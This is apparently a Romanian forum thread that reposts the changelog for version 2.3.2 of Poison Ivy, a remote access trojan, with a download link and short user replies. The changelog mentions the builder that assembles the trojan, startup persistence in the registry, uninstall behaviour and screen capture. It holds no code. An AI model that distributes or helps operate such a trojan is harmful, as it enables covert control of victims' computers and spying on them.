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Poison Ivy 2.3.2

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There was a critical little bug in the server building code that I just had to fix. The bug was client-side thus only the client's version has changed (since it assembles the server file).

Thanks to Shaddy who found it and helped me fix it!

So here's a new version with the following changes:

[+] - Feature added

[-] - Feature removed

[*] - Bug fixed on existing feature

[*] Fixed a crash when using both ActiveX and HKLM startup.

[*] Server now removes HKLM startup entry when uninstalled.

[*] Fixed autosave (screen capture) problem that some people experienced.

Si asta se connecteaza la un IP... fiti atenti!

Download: http://www.poisonivy-rat.com/dl.php?file=PI232

esti multumit kabout3r ?


dah ironia isi spune cuvantul....nu e nimic in neregula sa fii suspicios cu ceea ce downloadezi....doar nu vad rostul sa folosesti un mirror ca rapidshare cand poti folosi linkul dp site-ul lor...cine stie dp ce forum ai leechuit pi-ul ala :))

Guest Kenpachi
Mi`e nu`mi mere...plm ce are...:(

faci posthunting si cred ca te paste un mare bocanc in fund.

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